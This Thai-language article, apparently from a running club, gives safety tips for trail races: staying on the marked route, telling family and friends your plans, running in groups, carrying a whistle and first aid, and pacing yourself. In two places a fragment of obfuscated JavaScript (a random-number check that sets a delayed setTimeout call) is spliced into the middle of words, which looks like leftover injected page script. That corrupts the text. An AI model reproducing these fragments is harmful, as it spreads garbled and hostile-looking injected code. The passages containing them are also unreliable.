Safe & Fair คือแนวคิดและหลักการปฏิบัติที่สำคัญที่สุดสำหรับผู้จัดงานวิ่ง ไม่ว่าจะมีการปรับเปลี่ยนเส้นทางและกฎกติกามากน้อยเพียงใด หรือจะต้องปฏิบัติตามเสียงเรียกร้องจากผู้สมัครที่มีจำนวนมาก ก็ยังมีสิ่งที่แตะต้องไม่ได้ นั้นคือ กฎความปลอดภัยและการแข่งขันที่เสมอภาคกันทุกคน
เพราะสำหรับการแข่งขันแบบ Road Running อย่างการวิ่งมินิ ฮาร์ฟและมาราธอน จะเป็นรูปแบบสนามที่ควบคุมได้ มีการยอมรับจาก IAAF ที่เป็นองค์กรระดับโลก แต่การวิ่งแข่งขันเทรล ถือว่าเป็นการแข่งขันที่มีความเสี่ยงและมีตัวแปรหลายปัจจัยที่ไม่สามารถควบคุมได้ 100% สนามแข่งขันต้องเป็นไปตามสภาพสถานที่ ไม่สามารถปรับเปลี่ยนความชัน ทางราบ หรือออฟชั่นทางวิ่งอื่นๆ ได้มากตามถนนในเมือง ดังนั้นนอกเหนือจากการดูแลของผู้จัดงานวิ่งแล้ว นักวิ่งก็ควรเตรียมตัวป้องกันตัวเองและลดความเสี่ยงที่จะเกิดขึ้นระหว่างแข่งขันด้วย
KPTC Safety Trail Tips วิ่งเทรลอย่างไรให้ปลอดภัย
กรุณาอยู่บนเส้นทาง
เส้นทางวิ่งคือสถานที่ที่ปลอดภัยที่สุดขณะวิ่งแข่งขัน การออกนอกเส้นทางที่ผู้จัดงานทำไว้ให้มีโอกาสเสียงหลงทางสูงมาก และอาจจะต้องเข้าสู่โหมดเมาคลีผจญภัยในป่าใหญ่ก็ได้ สัตว์ร้ายและสัตว์มีพิษ มักจะเจอเมื่อเราออกนอกเส้นทางเสมอ
พื้นฐานเบื้องต้นสำหรับนักวิ่งเทรล คือ ต้องศึกษาเส้นทางวิ่งแข่งขันให้ละเอียดถี่ถ้วนทุกครั้ง จุดพยาบาล จุดบริการน้ำและอาหารต้องดูให้ดี เพื่อใช้บริหารเสบียงและการเติมพลังงาน นอกจากนี้สำหรับใครที่มีนาฬิกา GPS ก็สามารถดาวโหลดแผนที่ลงนาฬิกาไว้เพื่อนำทางและกันหลงไปในตัว
ไปมาลาไหว้
ในยุคสมัย Thailandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and 4.0 จงใช้ Social Media ให้เป็นประโยชน์ เมื่อต้องวิ่งเทรลเข้าป่าหายไปเป็นวัน ให้ป่าวประกาศบอกเพื่อนๆ พ่อแม่พี่น้อยด้วยว่าไปทำอะไร เพราะยิ่งคุณวิ่งระยะทางไกลๆ คุณจะหายหน้าหายตาไปนานโขเลย ยิ่งนักวิ่ง Ultra ด้วยแล้วก็คงกินเวลากว่า 10 ชั่วโมง
วางแผนบอกคนที่คุณรักและรู้จักให้ดี วางแผนเวลาที่จะใช้วิ่ง จะเข้า-ออก จบกี่โมง เพราะหากนานผิดปกติ จะได้ไหวตัวทัน พร้อมส่งทีมกู้ภัยได้ทันทั่วที หรือจะพกพาโทรศัพท์มือถือไปก็ดี แต่ก็อย่าลืมแบตเตอรี่สำรองละ
กลยุทธ์วิ่งไปเป็นกลุ่ม
ถ้ายังเป็นมือใหม่ไม่คุ้ยชินสถานทีก็ลองตีเนียนวิ่งเกาะกลุ่มกันไปเรื่อยๆ จะปลอดภัยและไม่เสียฟอร์ม แต่การเกาะกลุ่มวิ่งก็ไม่ใช่ว่าจะปล่อยให้เขานำทางไปตลอดเลยนะ ช่วงหัวเลี้ยวทางแยกก็สังเกตดูให้ดีว่าไปถูกทิศหรือไม่ ไม่งั้นจะได้สกิลหลงกันทั้งกลุ่มถ้วนหน้า แถมยังเสียเวลาวิ่งย้อนกลับไปมาอีกต่างหาก
อุปกรณ์เสริม
นอกจากเสบียงน้ำและอาหารสำหรับเติมพลังงานกลับเข้าไปใหม่แล้ว อุปกรณ์ที่ควรพกติดตัวไปด้วยก็เช่น อุปกรณ์ปฐมพยาบาล นกหวีดสำหรับส่งเสียงของความช่วยเหลือ มือถือและแบตเตอรี่สำรอง แจ็คเกตกันลมกันฝนแบบเบาๆ เพื่อไว้เวลาที่ฝนตกและอากาศหนาวลง เป็นต้น แต่ปกติแล้วก็ปล่อยตัวนักวิ่งเทรล เจ้าหน้าที่จะตรวจอุปกรณ์บังคับทุกครั้ง (Mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andatory Gears) ซึ่งในเอกสารบอกชุดอุปกรณ์บังคับ ก็อาจจะมีคำแนะนำเกี่ยวชุดอุปกรณ์แนะนำบางอย่างที่มีประโยชน์เหมาะกับสถานที่แข่งลงไปด้วย
ค่อยเป็นค่อยไป
หากเป็นเทรลแรก วิธีเอาตัวรอดง่ายๆ ก็คือเริ่มวิ่งช้าๆ เพื่อวอร์มอัพร่างกายและค่อยๆ ปรับระดับการวิ่งและ pace ของตัวเองให้อยู่ในระดับที่ง่ายที่สุด ไม่เร่งเร็วตามกลุ่มผู้นำหรือมวลนักวิ่งที่ประกบรอบตัวเรา หากสถานการณ์บังคับให้ต้องออกวิ่งเร็วๆ ไปพร้อมกับกลุ่มใหญ่ ก็ให้ค่อยๆ ฉีกตัวแยกออกมาแล้ววิ่งตาม pace ของเราที่สบายที่สุด
ในช่วงเวลาไต่และลงเขา พยายามดูไลน์ที่กลุ่มนักวิ่งข้างหน้าได้ทำไว้ สังเกตดูให้ดีว่าเขาขึ้นลงเส้นไหนกัน หรือมีเส้นทางที่เจ้าหน้าที่ได้ทำไว้แล้ว การบุกเบิกเส้นทางใหม่เองเสี่ยงต่อการบาดเจ็บโดนเศษหินและเสี้ยนไม้ทิ่มตำมาก